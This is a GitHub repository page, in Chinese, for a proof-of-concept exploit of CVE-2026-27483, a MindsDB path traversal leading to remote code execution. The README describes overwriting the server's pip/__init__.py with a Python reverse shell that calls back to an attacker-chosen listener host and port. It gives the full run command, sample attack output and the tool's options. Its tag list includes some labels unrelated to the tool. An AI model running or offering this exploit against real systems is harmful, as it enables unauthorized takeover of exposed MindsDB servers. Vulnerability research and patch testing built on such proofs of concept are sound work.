thewhiteh4t/cve-2026-27483
GitHub: thewhiteh4t/cve-2026-27483
针对 MindsDB 路径遍历漏洞 CVE-2026-27483 的 PoC 脚本,通过覆盖 Python 包文件实现远程代码执行。
Stars: 2 | Forks: 0
# CVE-2026-27483
## MindsDB 路径遍历导致 RCE PoC
本 PoC 脚本基于以下 [GitHub 公告](https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq)
- 默认情况下 MindsDB **不**使用认证
- PoC 支持**未认证**和**已认证**两种模式
- 我们可以查询 `/api/handlers/` 来查找可用的 handler,使用任何可用但未安装的 handler 名称
- PoC 会覆盖 `/venv/lib/python3.10/site-packages/pip/__init__.py`
- 一个 Python 反向 shell 会被写入上述路径,随后被触发执行
```
python cve-2026-27483.py -lh 192.168.0.100 -lp 4444 -u admin -p password
-------------------------------------
--- CVE-2026-27483 ------------------
--- MindsDB Path Traversal to RCE ---
-------------------------------------
[>] Found By : XlabAITeam
[>] PoC By : Lohitya Pushkar (thewhiteh4t)
[>] Target : http://127.0.0.1:47334
[>] LHOST : 192.168.0.100
[>] LPORT : 4444
[*] Checking status...
[*] MindsDB Version : 25.9.1.0
[+] Login successful!
[*] Uploading payload : qwvhotfj
[+] Payload uploaded!
[*] Triggering payload...
```
### 依赖
```
pip3 install requests packaging
```
### 使用方法
```
python cve-2026-27483.py -h
usage: cve-2026-27483.py [-h] [-rh RH] [-rp RP] [-lh LH] [-lp LP] [-u U] [-p P]
options:
-h, --help show this help message and exit
-rh RH Target host
-rp RP Target port
-lh LH Listener host
-lp LP Listener port
-u U Username
-p P Password
```
标签:CISA项目, CVE-2026-27483, MindsDB, PE 加载器, PoC, Python, RCE, 反弹Shell, 文件写入, 无后门, 暴力破解, 未经身份验证, 编程工具, 网络安全, 网络安全审计, 路径遍历, 远程代码执行, 逆向工具, 隐私保护